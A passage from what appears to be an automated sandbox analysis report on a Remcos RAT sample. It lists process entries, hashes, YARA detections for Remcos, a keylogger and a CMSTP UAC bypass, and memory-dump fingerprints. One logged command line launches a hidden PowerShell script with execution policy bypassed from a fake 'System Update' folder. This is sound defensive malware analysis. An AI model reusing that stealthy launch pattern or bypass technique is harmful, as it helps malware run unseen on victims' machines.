                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000014.00000002.2378700702.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                Has exited:true

                                Target ID:21
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\cmd.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\system32\cmd.exe" /c start /min "" Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff67dc30000
                                File size:289'792 bytes
                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:22
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:23
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                Wow64 process (32bit):false
                                Commandline:Powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -Comman ". 'C:\Users\user\AppData\Local\Microsoft\LocalLow\System Update\hwcrj.ps1' ";exit
                                Imagebase:0x7ff6e3d50000
                                File size:452'608 bytes
                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000017.00000002.2806942257.0000023E13C40000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                Has exited:true

                                Target ID:24
                                Start time:03:28:32
                                Start date:03/10/2024
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff66e660000
                                File size:862'208 bytes
                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:25
                                Start time:03:28:34
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):false
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x90000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                Target ID:26
                                Start time:03:28:34
                                Start date:03/10/2024
                                Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                                Imagebase:0x7ff6ae840000
                                File size:65'440 bytes
                                MD5 hash:0D5DF43AF2916F47D00C1573797C1A13
                                Has elevated privileges:false
                                Has administrator privileges:false
                                Programmed in:C, C++ or other language
                                Has exited:true

                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a361e8579e3fd3546c5a0db944ba7eb7b2679f1357834cb7679600bed709aedc
                                  • Instruction ID: 608c8e7febd355b9d4544f176d08a5159e8daeccbe6833be4fb0de6660209fe7
                                  • Opcode Fuzzy Hash: a361e8579e3fd3546c5a0db944ba7eb7b2679f1357834cb7679600bed709aedc
                                  • Instruction Fuzzy Hash: 88F0A031F088094FE355F22890AA2F93283DBDA315F204179E40EC33D7DDACAC525680
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0a95f34b3cc313060a96479e2db4c8c1e6816f461c2a0475d4965908c117ea93
                                  • Instruction ID: 22de026043215ad271137333fe08d7ce853d7ff141e33ab71dec46f66e8eb672
                                  • Opcode Fuzzy Hash: 0a95f34b3cc313060a96479e2db4c8c1e6816f461c2a0475d4965908c117ea93
                                  • Instruction Fuzzy Hash: EDF03A20F286094FF39AE76884653B83696AF46305F100179E60DD73D6CEAD6C40D381
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3097893186.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: bb13d121cdce6b9f6a4f38776fd630214e5ee72f1439746cb35b5047d558ba65
                                  • Instruction ID: 18eeed2a6108248167bef1760deaa65e69409440a7fb6803f5138516cd64367e
                                  • Opcode Fuzzy Hash: bb13d121cdce6b9f6a4f38776fd630214e5ee72f1439746cb35b5047d558ba65
                                  • Instruction Fuzzy Hash: 87E08663F4D9390AE7E1E65C24696F4A3C1EF9972178502B3DA0DD3296EC09AC9012C0
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e7553b5254708703bf6ccd10b3cbd07867f095ae271272914d24e656cf99cb99
                                  • Instruction ID: e63f32789e5b96b63ab47d76dae117747bfde80b7b8f9650a5c58f60d1e904ff
                                  • Opcode Fuzzy Hash: e7553b5254708703bf6ccd10b3cbd07867f095ae271272914d24e656cf99cb99
                                  • Instruction Fuzzy Hash: DEE06D30B28A084FF305E76C806136936D3EB8A705F200079E50DDB393DDAA6C82C350
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 82516fcfec3a6ea8dfe0d8f1980ba125ab5a84d45cb2eda90b924498dc6b46d0
                                  • Instruction ID: 6aac6c40a43b61b5a201ffcd930a1f5e816c873fad93c481cf69d8b266b028ff
                                  • Opcode Fuzzy Hash: 82516fcfec3a6ea8dfe0d8f1980ba125ab5a84d45cb2eda90b924498dc6b46d0
                                  • Instruction Fuzzy Hash: FBE04F31F5D9098FDB19DA18D4907A873A2EB85311F2082BAD10DC729ADE789886DA84
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4455d9b2bfd220c477fd582a725554bc27bc12ffde9f69e206e85a9da026afe1
                                  • Instruction ID: 984907bef94489415a33020ea61a1ee61a8aeeac92e75f1c0f22dd9a1c312b3c
                                  • Opcode Fuzzy Hash: 4455d9b2bfd220c477fd582a725554bc27bc12ffde9f69e206e85a9da026afe1
                                  • Instruction Fuzzy Hash: E9D0A725F294480BE308E734802133531878B87325F104238F62FC33D1DD691C019211
                                  Memory Dump Source
                                  • Source File: 00000004.00000002.3095863449.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_4_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e6d9db4e71611ec26993dd760ddd393e7e4c6a9ddf99162c1b4521f092c6b2ae
                                  • Instruction ID: 0bf3eea9f85f908a048b466bc3cacbf3750d276de0979268f59146b1ca264407
                                  • Opcode Fuzzy Hash: e6d9db4e71611ec26993dd760ddd393e7e4c6a9ddf99162c1b4521f092c6b2ae
                                  • Instruction Fuzzy Hash: DBC04C50F1C90A8AF2247568B9B727CB291EB5A302F105135F64DD32D3DC687C55554A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f23d6c21127cc6c621321076b71053ebfc5b2ad9e4d387843b96b42956baa5dd
                                  • Instruction ID: 5639cd5d0f20408c95814d944fac57e7f7432fef884e92946fc5881ce71b065a
                                  • Opcode Fuzzy Hash: f23d6c21127cc6c621321076b71053ebfc5b2ad9e4d387843b96b42956baa5dd
                                  • Instruction Fuzzy Hash: 03413A71A1CE884FDB599B5C98466B97BE0FB99310F00812FE089C3252DB74B845CBC2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2973360571.00007FFD3449D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3449D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd3449d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b846f155b00692535c19cafa7e635316b63d55c97f757f8ac6fcadb1d271475a
                                  • Instruction ID: 7a1ddeb53c6cd096266e0e4502316702d6d3a0ac9f74a026d384d0f8ffb70c62
                                  • Opcode Fuzzy Hash: b846f155b00692535c19cafa7e635316b63d55c97f757f8ac6fcadb1d271475a
                                  • Instruction Fuzzy Hash: 3041067140DBC45FE756CB2998959523FF0EF57320B1A01EFD088CB1E7DA29A846C7A2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff7a1dddbf8324c3e43dca2e9f6399c608df04be493bb223cf3bb78fff5c345c
                                  • Instruction ID: 8103eaf6b1ab61e28f04cde92db87d8a826eb2044bcc4e0d09a8e49df6850363
                                  • Opcode Fuzzy Hash: ff7a1dddbf8324c3e43dca2e9f6399c608df04be493bb223cf3bb78fff5c345c
                                  • Instruction Fuzzy Hash: AD31E53190D7884FDB59DF68884A7EA7FF0EB96321F0541ABD048C7163D738A846CB51
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 44e60b6f90ec62e39789f12d11948b0c6bec9b58941a8c9040ea4b5e53b00071
                                  • Instruction ID: 59cde435aa5890ac44e3a600ed504a4aae6dfc3d0e22a354da4695de7e8d7680
                                  • Opcode Fuzzy Hash: 44e60b6f90ec62e39789f12d11948b0c6bec9b58941a8c9040ea4b5e53b00071
                                  • Instruction Fuzzy Hash: 5A110272B0D68C8FEBA1EF9890A41A87BD1EF4A310F0401BEC54DDB193CA28A845C320
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction ID: e0f8365b16397456555a3586aef99a22a5c7f1437f2a0f879beee55bc7f743ae
                                  • Opcode Fuzzy Hash: 67d1617613e612b7a049b31fcb3c0c06bb00aa9b6616606570c7eb9b15762ca9
                                  • Instruction Fuzzy Hash: 5301677121CB0C4FD744EF0CE451AA6B7E0FB95364F50056DE58AC3661DA36E882CB45
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8c96e441bb6a8dc26b74e41295ac5314757895276bac05d89efc8c153a85af19
                                  • Instruction ID: 1f9833450217bfcd35f9185b4d8c9bb726101e4cfefa0e58f49052e638ff1d8a
                                  • Opcode Fuzzy Hash: 8c96e441bb6a8dc26b74e41295ac5314757895276bac05d89efc8c153a85af19
                                  • Instruction Fuzzy Hash: 10014C3581C3854FE346AF3C98650E63F62EF23211F1540A7D598CE173E7299A44C7C2
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccde5ec29ecc09bc717ce20e50634ba227ecd421743e65ca3f1faa3856ffbdf6
                                  • Instruction ID: 579c2255e0a166dedac05376e45fbea681f1d5977577741ebc116a673820d809
                                  • Opcode Fuzzy Hash: ccde5ec29ecc09bc717ce20e50634ba227ecd421743e65ca3f1faa3856ffbdf6
                                  • Instruction Fuzzy Hash: 14F0BE32B4C5548FD7A8EE4CE4904E873E0EF5632071100BAE19DC7163DA29EC40C780
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f4d6f590a1d22996f5df73fb7035958a7a483f5e9515f8e9a7d63b080e8e8ea0
                                  • Instruction ID: b380de01e759278f48f769cecf0d83cc21a97f463672835a1bd78564bdf7be8e
                                  • Opcode Fuzzy Hash: f4d6f590a1d22996f5df73fb7035958a7a483f5e9515f8e9a7d63b080e8e8ea0
                                  • Instruction Fuzzy Hash: BEF05832A4D6548FDBA4EE4CE4919E8B7E0EF46324B5500B6E25DCB463EA2AAC50C750
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2987521238.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: fdb8ed03b090c9051358b335e04323c352ea65cc8fcb3d86cf8ffce3a64db182
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: CFE04F31B4C8288FDAA8DE0CE0909F973E1EF9933171101B7D28EC7561DA26EC51DB80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.2981539555.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_7ffd345b0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: N_^=$N_^@$N_^T$N_^U$N_^W$N_^Y
                                  • API String ID: 0-17849902
                                  • Opcode ID: ca3745852a2e69d2b78a1b3f43b8aaac156c8b37c5fc53744375dbc9b9916023
                                  • Instruction ID: 0a882024b67820146b271ff8dde64959a4d0347595669312996d4c13025ddb3c
                                  • Opcode Fuzzy Hash: ca3745852a2e69d2b78a1b3f43b8aaac156c8b37c5fc53744375dbc9b9916023
                                  • Instruction Fuzzy Hash: DA2101A3B185255BD31237ADBC612E83B85EFA137234502F2E358DF213DD24A48B8682
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d932cb3109c7cca9de41216c20fdc05afde7b6a7b99c464d952c0c0e42057db0
                                  • Instruction ID: fbef78ceed462707bb1aba04bc452586e31d82871639533f283d7319169e12c6
                                  • Opcode Fuzzy Hash: d932cb3109c7cca9de41216c20fdc05afde7b6a7b99c464d952c0c0e42057db0
                                  • Instruction Fuzzy Hash: 83119D7190E7C54FEB839B2458651A97FA0AF13200B1901E7D588CB0E3EA2998188792
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 77dea3ce18f064c0edba118e65d0b51d043be785dcc1c992b1c7e1b20e61b42e
                                  • Instruction ID: 29b8c26b3e201652ad431f5f4c556a46a88e4921bd3ee6a53b13a97f74f8f9fa
                                  • Opcode Fuzzy Hash: 77dea3ce18f064c0edba118e65d0b51d043be785dcc1c992b1c7e1b20e61b42e
                                  • Instruction Fuzzy Hash: BBF0627590E7C84FDB979F2498684987FB0EF67205B0901EBD549CB0B3DA299C58CB82
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 63380469681b03bc124bb108d32067eb6af1aee70dfd852e7687c72403504868
                                  • Instruction ID: c93889cd5722b983465c920cfedd68cda49a2e9883cead08abb0144e803c31d0
                                  • Opcode Fuzzy Hash: 63380469681b03bc124bb108d32067eb6af1aee70dfd852e7687c72403504868
                                  • Instruction Fuzzy Hash: 0141E571A0DE888FEB599B5C98466B97BE0FB99310F00412FE549D3292DB24E855CFC2
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2917877724.00007FFD3448D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD3448D000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd3448d000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2059ce0f19320bab9cbd240e57bfb99c2d0ea9b15c25a827ba8400dd3472135f
                                  • Instruction ID: 1e377a3c05e577a2ded165bd30e08408f735537e613efa69aec07f5541969748
                                  • Opcode Fuzzy Hash: 2059ce0f19320bab9cbd240e57bfb99c2d0ea9b15c25a827ba8400dd3472135f
                                  • Instruction Fuzzy Hash: 0141287190DBC44FE796CB2898959523FF0EF53324B1605EFD089CB1A7D62AA806C793
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c42cbe860445d6524da5e20ef12c2683f22e77d8372aa32865ab5f7304c1fa4d
                                  • Instruction ID: 785d9acfedc0e577abb25aee498826e0e30f49c01e6f9a3e108202f48184b43e
                                  • Opcode Fuzzy Hash: c42cbe860445d6524da5e20ef12c2683f22e77d8372aa32865ab5f7304c1fa4d
                                  • Instruction Fuzzy Hash: A731D47190D7884FDB5ADF68885A6E93FF0EF96321F0441ABD148C71A3D639A809CB51
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 526b9c7638b18bc81bafd74b3be9c352135148a4ae0f471f54cb241fa03e8ed8
                                  • Instruction ID: c721b1ae378f046a5264ac571e4f500148ab571721625236d966a9ed50271001
                                  • Opcode Fuzzy Hash: 526b9c7638b18bc81bafd74b3be9c352135148a4ae0f471f54cb241fa03e8ed8
                                  • Instruction Fuzzy Hash: 6E110232B0D6894FEB51EEA884A45A87BD1EF4A320B0481BEC54DDB193DA2CA845C360
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                  • Instruction ID: b7be8378397c277a12bbf95699010c8dedcbfcd85235336e64c80b42ffd499b7
                                  • Opcode Fuzzy Hash: 76d70864090ee490991c90939bad70b8686d9afa50a49723ed7ebb2cc1aa164d
                                  • Instruction Fuzzy Hash: A301677121CB0C4FD784EF0CE451AA5B7E0FB95364F10056EE58AC36A1DA36E882CB45
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e5f8e2c0de9855ee15856fe66ec819d1f27cf3d58c521f595e76de15d0830bfa
                                  • Instruction ID: e395c52eb549613baf8110d8c1dca2278c07ebfc4c987b48326da432ed0cb58a
                                  • Opcode Fuzzy Hash: e5f8e2c0de9855ee15856fe66ec819d1f27cf3d58c521f595e76de15d0830bfa
                                  • Instruction Fuzzy Hash: 09F09A32B4C5548FD7A8EE4CE8944E877E4EF5632071100BAE19DC7563CA29EC40C780
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00f271c2d7a4964e2e9b7e6be719aa1cb7af6671262a60468ba168603a495af2
                                  • Instruction ID: 2138dc0e1db139b6c8fa98b256547981e87360ef6df5988de902ddb7fc1f7a42
                                  • Opcode Fuzzy Hash: 00f271c2d7a4964e2e9b7e6be719aa1cb7af6671262a60468ba168603a495af2
                                  • Instruction Fuzzy Hash: 2EF0BE32A8C6448FD794EE5CE8944E87BE0EF06324B1100B6E18DC7067CA29AC40D740
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2931986483.00007FFD34670000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34670000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd34670000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction ID: e1d637861dc44f016fd111c09d8ac5b5712ce95191d6a14aabc9289cbec3c765
                                  • Opcode Fuzzy Hash: 05dd94a12dc45e8f7da9c60e7e1a12ab84c0b153eba5a8a472aa7bc71ce4f1d8
                                  • Instruction Fuzzy Hash: 0BE09A31B0C8288FDA68EE0CE4948F873E1EB9937071141B7D28EC3521CA26EC418B80
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^=$O_^@$O_^T$O_^U$O_^W$O_^Y
                                  • API String ID: 0-102297637
                                  • Opcode ID: d22c54aaf6e82a722451d72018c1a723a08b894847c0f1906f4d3ca71e110467
                                  • Instruction ID: 113bfc867cb5dbc96d7666598e98d6b35257ac316d762ffd2f4d677c6e676211
                                  • Opcode Fuzzy Hash: d22c54aaf6e82a722451d72018c1a723a08b894847c0f1906f4d3ca71e110467
                                  • Instruction Fuzzy Hash: CF2165B77185259FD20237AEB8512D93B85DFE167334505F2E25EDF313DD14A88B8980
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^$O_^$O_^$O_^$O_^$O_^
                                  • API String ID: 0-3255002459
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2926350351.00007FFD345A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_7ffd345a0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: O_^$O_^$O_^$O_^$O_^
                                  • API String ID: 0-2660881393
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.2369265534.00007FFD345D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345D0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_7ffd345d0000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:

                                  Execution Graph

                                  Execution Coverage:6.5%
                                  Dynamic/Decrypted Code Coverage:0%
                                  Signature Coverage:0%
                                  Total number of Nodes:13
                                  Total number of Limit Nodes:0

                                  Control-flow Graph

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2815299199.00007FFD34680000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34680000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_13_2_7ffd34680000_powershell.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: M_H
                                  • API String ID: 0-3997733227

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000D.00000002.2808794988.00007FFD345B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD345B0000, based on PE: false
                                  Joe Sandbox IDA Plugin
